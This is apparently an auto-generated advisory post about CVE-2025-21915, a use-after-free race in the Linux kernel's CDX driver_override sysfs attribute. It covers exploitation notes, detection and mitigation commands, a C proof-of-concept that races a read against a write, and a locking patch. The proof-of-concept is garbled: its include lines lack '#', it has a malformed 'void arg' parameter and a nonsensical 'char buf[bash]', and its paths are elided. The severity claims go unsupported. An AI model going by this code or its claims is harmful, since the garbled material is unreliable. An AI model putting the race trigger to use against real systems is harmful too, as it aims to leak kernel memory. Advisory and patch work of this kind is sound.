The CVE-2025-21915 vulnerability in the Linux kernel involves a Use-After-Free (UAF) issue in the `driver_override_show()` function within drivers/cdx/cdx.c. This function is part of DEVICE_ATTR_RW, which allows concurrent execution of `driver_override_show()` and `driver_override_store()` via sysfs.
When `driver_override_store()` updates `driver_override` using driver_set_override(), it locks the device via device_lock(dev). However, `driver_override_show()` reads `cdx_dev->driver_override` without proper locking, leading to a race condition. If `driver_override_store()` frees the string while `driver_override_show()` is reading it, the latter may dereference a freed pointer, potentially leaking kernel memory addresses to userspace.
This vulnerability is particularly dangerous because `DEVICE_ATTR` sysfs entries are readable by all users, exposing sensitive kernel data or facilitating further exploitation. Similar patterns in other subsystems (e.g., drivers/amba/bus.c) were found to correctly use locking, confirming this as a security flaw.
DailyCVE Form
Platform: Linux Kernel
Version: Pre-patch versions
Vulnerability: Use-After-Free (UAF)
Severity: Critical
Date: 04/15/2025
What Undercode Say:
Exploitation Analysis:
- Attackers could repeatedly read `/sys/…/driver_override` to leak kernel pointers.
- May combine with heap grooming to control freed memory.
- Exploitability depends on sysfs access permissions.
Detection Commands:
Check if vulnerable CDX driver is loaded: lsmod | grep cdx Verify kernel version: uname -r Monitor sysfs accesses (requires auditd): auditctl -w /sys/devices/cdx -p rwa -k cdx_override
Mitigation Steps:
- Apply kernel patches from kernel.org.
2. Restrict sysfs access:
chmod 600 /sys/devices/cdx//driver_override
3. Disable CDX driver if unused:
echo "blacklist cdx" >> /etc/modprobe.d/blacklist.conf
Proof-of-Concept (PoC) Snippet:
// Race condition trigger (concurrent read/write):
include <fcntl.h>
include <pthread.h>
void read_thread(void arg) {
int fd = open("/sys/.../driver_override", O_RDONLY);
char buf[bash]; read(fd, buf, sizeof(buf)); // UAF read
close(fd); return NULL;
}
int main() {
pthread_t t; pthread_create(&t, NULL, read_thread, NULL);
int fd = open("/sys/.../driver_override", O_WRONLY);
write(fd, "new_value", 9); // Concurrent write
pthread_join(t, NULL); close(fd); return 0;
}
Patch Analysis:
The fix involves adding `device_lock(dev)` in `driver_override_show()`:
+ device_lock(dev); ret = sprintf(buf, "%s\n", cdx_dev->driver_override); + device_unlock(dev);
References:
- Kernel Git Commit: kernel.org/…/cdx-fix-uaf
- CVE Details: nvd.nist.gov/vuln/detail/CVE-2025-21915
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
